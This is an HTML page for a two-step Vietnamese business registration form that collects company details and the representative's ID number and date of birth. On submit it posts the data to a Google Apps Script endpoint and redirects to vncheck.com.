<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Đăng ký thông tin doanh nghiệp</title>
    <link rel="icon" href="nkđt_logo.jpg" type="image/x-icon">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">

        <style>
            body {
                margin: 0;
                padding: 0;
                height: 120vh;
                background: linear-gradient(to bottom, #DFFFD7, #90EE90);
                background-repeat: no-repeat;
            }
    
            .section {
                display: none;
            }
    
            .section.active {
                display: block;
            }
    
            .btn-group-vertical .btn {
                margin-top: 10px;
            }
    
            .form-check-label {
                display: inline-block;
                margin-right: 10px;
            }
    
            .section h2 {
                text-align: center;
            }

            @media (orientation: portrait) {
                .container {
                    width: 94vw;
                }
            }
    
            @media (orientation: landscape) {
    
                .container {
                    width: 33vw;
                }
            }
    
            .overlay {
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.5);
                display: none;
                justify-content: center;
                align-items: center;
                z-index: 9999;
            }
    
            .spinner {
                border: 6px solid #f3f3f3;
                border-top: 6px solid #3498db;
                border-radius: 50%;
                width: 50px;
                height: 50px;
                animation: spin 1s linear infinite;
            }
    
            @keyframes spin {
                0% {
                    transform: rotate(0deg);
                }
    
                100% {
                    transform: rotate(360deg);
                }
            }
        </style>
</head>

<body>
    <div class="overlay" id="overlay">
        <div class="spinner"></div>
    </div>
    <div class="container" style="margin-bottom: 10vh; margin-top: 2vh;">
        <form id="multi-section-form" method="post">
            <div class="section active" id="section1">
                <br>
                <h2>THÔNG TIN DOANH NGHIỆP</h2>
                <br>
                <div class="mb-3">
                    <label for="company" class="form-label">Tên công ty:</label>
                    <input type="text" class="form-control" id="company" name="company" required>
                </div>
                <div class="mb-3">
                    <label for="website" class="form-label">Link website:</label>
                    <input type="text" class="form-control" id="website" name="website" required>
                </div>
                <div class="mb-3">
                    <label for="taxcode" class="form-label">Mã số thuế:</label>
                    <input type="text" class="form-control" id="taxcode" name="taxcode" required>
                </div>
                <div class="mb-3">
                    <label for="companyPhone" class="form-label">Số điện thoại:</label>
                    <input type="text" class="form-control" id="companyPhone" name="companyPhone" required>
                </div>
                <div class="mb-3">
                    <label for="companyEmail" class="form-label">Email:</label>
                    <input type="companyEmail" class="form-control" id="companyEmail" name="companyEmail" required>
                </div>
                <div class="mb-3">
                    <label for="companyAddress" class="form-label">Địa chỉ:</label>
                    <input type="companyAddress" class="form-control" id="companyAddress" name="companyAddress" required>
                </div>
                <div class="d-flex justify-content-center">
                    <button type="button" class="btn btn-primary" onclick="validateNext(2)">Tiếp theo</button>
                </div>
            </div>
            <div class="section" id="section2">
                <br>
                <h2>THÔNG TIN CHỦ ĐƠN VỊ</h2>
                <br>
                <div class="mb-3">
                    <label for="admin" class="form-label">Người đại diện:</label>
                    <input type="admin" class="form-control" id="admin" name="admin" required>
                </div>
                <div class="mb-3">
                    <label for="phone" class="form-label">Số điện thoại:</label>
                    <input type="text" class="form-control" id="phone" name="phone" required>
                </div>
                <div class="mb-3">
                    <label for="email" class="form-label">Email:</label>
                    <input type="email" class="form-control" id="email" name="email" required>
                </div>
                <div class="mb-3">
                    <label for="id" class="form-label">Số CCCD / CMND:</label>
                    <input type="id" class="form-control" id="id" name="id" required>
                </div>
                <div class="mb-3">
                    <label for="dob" class="form-label">Ngày sinh:</label>
                    <input type="dob" class="form-control" id="dob" name="dob" required>
                </div>
                <br>
                <div class="d-flex justify-content-center">
                    <button type="button" class="btn btn-secondary" onclick="previousSection(1)">Quay lại</button>
                    <button type="submit" class="btn btn-success ms-2">Xác nhận</button>
                </div>
                <br>
            </div>
        </form>
    </div>
    <script>
        function nextSection(sectionNumber) {
            const currentSection = document.querySelector('.section.active');
            currentSection.classList.remove('active');

            const nextSection = document.querySelector(`#section${sectionNumber}`);
            nextSection.classList.add('active');
        }

        function previousSection(sectionNumber) {
            const currentSection = document.querySelector('.section.active');
            currentSection.classList.remove('active');

            const previousSection = document.querySelector(`#section${sectionNumber}`);
            previousSection.classList.add('active');
        }

        function validateNext(nextSectionNumber) {
            const currentSection = document.querySelector('.section.active');
            const inputs = currentSection.querySelectorAll('input, select');
            let isValid = true;

            inputs.forEach(input => {
                if (input.checkValidity() === false) {
                    isValid = false;
                    input.reportValidity();
                }
            });

            if (isValid) {
                nextSection(nextSectionNumber);
            }
        }
    </script>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            document.getElementById("multi-section-form").addEventListener("submit", function (event) {
                event.preventDefault();
                var formData = new FormData(event.target);
                fetch('https://script.google.com/macros/s/AKfycbwnr9hbTdjvUgryXM4eICWz52LbQA7BJlR0pZACPYXc__wGttfpXsr0VLAy14DCFroZ/exec', {
                    method: 'POST',
                    body: formData
                })
                    .then(response => {
                        if (response.ok) {
                            window.location.href = 'https://vncheck.com/';
                        } else {
                            console.error('Có lỗi khi gửi dữ liệu');
                        }
                    })
                    .catch(error => {
                        console.error('Lỗi khi gửi dữ liệu:', error);
                    });
            });
        });

    </script>
    <script>
        // Hiển thị lớp phủ và biểu tượng Spinner khi nút Submit được nhấn
        document.addEventListener("DOMContentLoaded", function () {
            var form = document.getElementById("multi-section-form");
            var overlay = document.getElementById("overlay");

            form.addEventListener("submit", function (event) {
                event.preventDefault(); // Ngăn form gửi thông tin một cách thông thường
                overlay.style.display = "flex"; // Hiển thị lớp phủ
            });
        });
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz"
        crossorigin="anonymous"></script>
</body>

</html>